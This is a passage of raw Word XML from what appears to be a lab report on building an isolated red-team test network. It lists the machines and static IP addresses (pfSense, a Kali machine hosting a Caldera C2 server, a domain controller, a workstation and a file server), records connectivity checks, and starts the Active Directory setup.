      <w:r w:rsidR="0002596C" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">internal network’s gateway router and </w:t>
      </w:r>
      <w:r w:rsidR="00D30170" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>firewall)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66004C7F" w14:textId="66BACCDA" w:rsidR="009541E7" w:rsidRPr="00FF6966" w:rsidRDefault="00D30170" w:rsidP="009541E7">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VirtualBox’s Virtual Switch</w:t>
      </w:r>
      <w:r w:rsidR="00F9426B" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C651B9" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>– manages the internal network ‘intnet’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0622221C" w14:textId="4DB7D8B2" w:rsidR="007837FB" w:rsidRPr="00FF6966" w:rsidRDefault="00D30170" w:rsidP="00493262">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali Debian 64-bit Linux </w:t>
      </w:r>
      <w:r w:rsidR="00827B5D" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>where the C2-</w:t>
      </w:r>
      <w:r w:rsidR="003C785F" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Command </w:t>
      </w:r>
      <w:r w:rsidR="00D21C33" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and Caldera Server is run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41728F38" w14:textId="59E6B1CB" w:rsidR="00493262" w:rsidRPr="00FF6966" w:rsidRDefault="00B22FC9" w:rsidP="00493262">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Server 2022 </w:t>
      </w:r>
      <w:r w:rsidR="00AC1809" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cting as Domain Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78069C6A" w14:textId="6E392D94" w:rsidR="00B22FC9" w:rsidRPr="00FF6966" w:rsidRDefault="00B22FC9" w:rsidP="00493262">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows 10</w:t>
      </w:r>
      <w:r w:rsidR="003F2B95" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F9426B" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as the initially compromised workstation</w:t>
      </w:r>
      <w:r w:rsidR="00C651B9" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ‘enduser1’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449514E8" w14:textId="0C1AAFE3" w:rsidR="00C651B9" w:rsidRPr="00FF6966" w:rsidRDefault="00AC1809" w:rsidP="00493262">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Server 2022 acting as the fileserver </w:t>
      </w:r>
      <w:r w:rsidR="00BA79FF" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">workstation ‘FS’ </w:t>
      </w:r>
      <w:r w:rsidR="00DC33ED" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>aka ‘enduser2’</w:t>
      </w:r>
      <w:r w:rsidR="00430AD5" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> – this is the end goal machine </w:t>
      </w:r>
      <w:r w:rsidR="00862EAE" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">containing a simple GOLD.txt file </w:t>
      </w:r>
      <w:r w:rsidR="00E30942" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">in which lateral movement </w:t>
      </w:r>
      <w:r w:rsidR="005B75D2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="00E30942" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>needed to get to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF881CD" w14:textId="2FBD119E" w:rsidR="00DD4736" w:rsidRPr="00FF6966" w:rsidRDefault="009365D0" w:rsidP="00EF5B72">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>On each machine</w:t>
      </w:r>
      <w:r w:rsidR="005A0966" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> we configured </w:t>
      </w:r>
      <w:r w:rsidR="004D308E" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">their </w:t>
      </w:r>
      <w:r w:rsidR="00AD130B" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">IPv4 network settings to be </w:t>
      </w:r>
      <w:r w:rsidR="005A0966" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">static </w:t>
      </w:r>
      <w:r w:rsidR="0068194E" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and assigned necessary information manually</w:t>
      </w:r>
      <w:r w:rsidR="00E911AC" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0447190E" w14:textId="2B0AB4A5" w:rsidR="00DD4736" w:rsidRPr="00FF6966" w:rsidRDefault="00E725E2" w:rsidP="00EF5B72">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>The configurations</w:t>
      </w:r>
      <w:r w:rsidR="00DD4736" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3934294E" w14:textId="77777777" w:rsidR="00E725E2" w:rsidRDefault="005B75D2" w:rsidP="00E725E2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PfSense</w:t>
      </w:r>
      <w:r w:rsidR="001F6F8B" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: 192.168.1.1</w:t>
      </w:r>
      <w:r w:rsidR="00BA0433" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> as LAN and gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EA365E" w14:textId="77777777" w:rsidR="00E725E2" w:rsidRDefault="00780ADE" w:rsidP="00E725E2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E725E2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali: 192.168.1.100</w:t>
      </w:r>
      <w:r w:rsidR="00162B6D" w:rsidRPr="00E725E2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/24</w:t>
      </w:r>
      <w:r w:rsidR="009A6554" w:rsidRPr="00E725E2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> as ‘eth1’ within ‘intnet’ LAN – assuming initial compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A4A1F4" w14:textId="77777777" w:rsidR="00E725E2" w:rsidRDefault="009A6554" w:rsidP="00E725E2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E725E2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows DC: 192.168.1.2</w:t>
      </w:r>
      <w:r w:rsidR="008B03AD" w:rsidRPr="00E725E2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AC8BE2" w14:textId="77777777" w:rsidR="00E725E2" w:rsidRDefault="00F12A46" w:rsidP="00E725E2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E725E2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Compromised</w:t>
      </w:r>
      <w:r w:rsidR="00F75A09" w:rsidRPr="00E725E2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E725E2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Workstation:192.168.1</w:t>
      </w:r>
      <w:r w:rsidR="0000605B" w:rsidRPr="00E725E2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.3/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657E2615" w14:textId="6403B30D" w:rsidR="00520682" w:rsidRPr="00E725E2" w:rsidRDefault="00F75A09" w:rsidP="00E725E2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E725E2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">FS: </w:t>
      </w:r>
      <w:r w:rsidR="003F06BF" w:rsidRPr="00E725E2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>192.168.1.4/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7A8694" w14:textId="1F4A916E" w:rsidR="00E0023F" w:rsidRDefault="008D38A3" w:rsidP="00DB7549">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>As all five machines were actively running, we confirmed</w:t>
      </w:r>
      <w:r w:rsidR="000668A6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that they were able to communicate by </w:t>
      </w:r>
      <w:r w:rsidR="005B75D2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>performing</w:t>
      </w:r>
      <w:r w:rsidR="000668A6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> simple </w:t>
      </w:r>
      <w:r w:rsidR="003237A6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pings between each other utilizing their IP addresses. No machine could reach any IP NOT defined within the ‘intnet’</w:t>
      </w:r>
      <w:r w:rsidR="009C5BD6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> network to ensure a safe testing environment. Each machine was confirmed to be able to reach each other. </w:t>
      </w:r>
      <w:r w:rsidR="00854453">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Although we intended to </w:t>
      </w:r>
      <w:r w:rsidR="00E17578">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set up</w:t>
      </w:r>
      <w:r w:rsidR="00854453">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the Kali machine to</w:t>
      </w:r>
      <w:r w:rsidR="00E346B5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> connect</w:t>
      </w:r>
      <w:r w:rsidR="00854453">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00052EC4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to the WAN interface on the router as if their entry originated from the internet to simulate more realism</w:t>
      </w:r>
      <w:r w:rsidR="00681E07">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E212AA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>we ran out of time to configure that</w:t>
      </w:r>
      <w:r w:rsidR="00FD4884">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> properly. </w:t>
      </w:r>
      <w:r w:rsidR="0039373C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The Kali machine though does have two network </w:t>
      </w:r>
      <w:r w:rsidR="00E17578">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>adapters</w:t>
      </w:r>
      <w:r w:rsidR="003A5DE1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00E17578">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ‘</w:t>
      </w:r>
      <w:r w:rsidR="00D763E6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eth1’ fo</w:t>
      </w:r>
      <w:r w:rsidR="00E0023F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00D763E6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00807D1E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>internal</w:t>
      </w:r>
      <w:r w:rsidR="003A5DE1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00807D1E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and ‘eth0’ </w:t>
      </w:r>
      <w:r w:rsidR="00E0023F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">as a NAT </w:t>
      </w:r>
      <w:r w:rsidR="00632803">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">via </w:t>
      </w:r>
      <w:r w:rsidR="00507078">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DHCP</w:t>
      </w:r>
      <w:r w:rsidR="00632803">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E0023F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to simulate the attacker having internet access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F323D1F" w14:textId="77777777" w:rsidR="00B36953" w:rsidRDefault="00681E4D" w:rsidP="00520682">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">After networking them together, </w:t>
      </w:r>
      <w:r w:rsidR="00032743">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>we headed ove</w:t>
      </w:r>
      <w:r w:rsidR="00B50191">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">r </w:t>
      </w:r>
      <w:r w:rsidR="000D48B7">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to the</w:t>
      </w:r>
      <w:r w:rsidR="003525EB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00360573">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="003525EB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> domain controller machine</w:t>
      </w:r>
      <w:r w:rsidR="003031D6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> as administrator</w:t>
      </w:r>
      <w:r w:rsidR="002705F1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to create the </w:t>
      </w:r>
      <w:r w:rsidR="006053A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">network’s domain. </w:t>
      </w:r>
      <w:r w:rsidR="0079515C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">On </w:t>
      </w:r>
      <w:r w:rsidR="00360573">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="0079515C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">server manager, </w:t>
      </w:r>
      <w:r w:rsidR="00BE54C6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">we added roles and features on the dashboard. Selected role-based installation and installed </w:t>
      </w:r>
      <w:r w:rsidR="00507078">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00BE54C6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ctive </w:t>
      </w:r>
      <w:r w:rsidR="00507078">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00BE54C6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">irectory </w:t>
      </w:r>
      <w:r w:rsidR="00507078">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00BE54C6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">omain </w:t>
      </w:r>
      <w:r w:rsidR="00507078">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
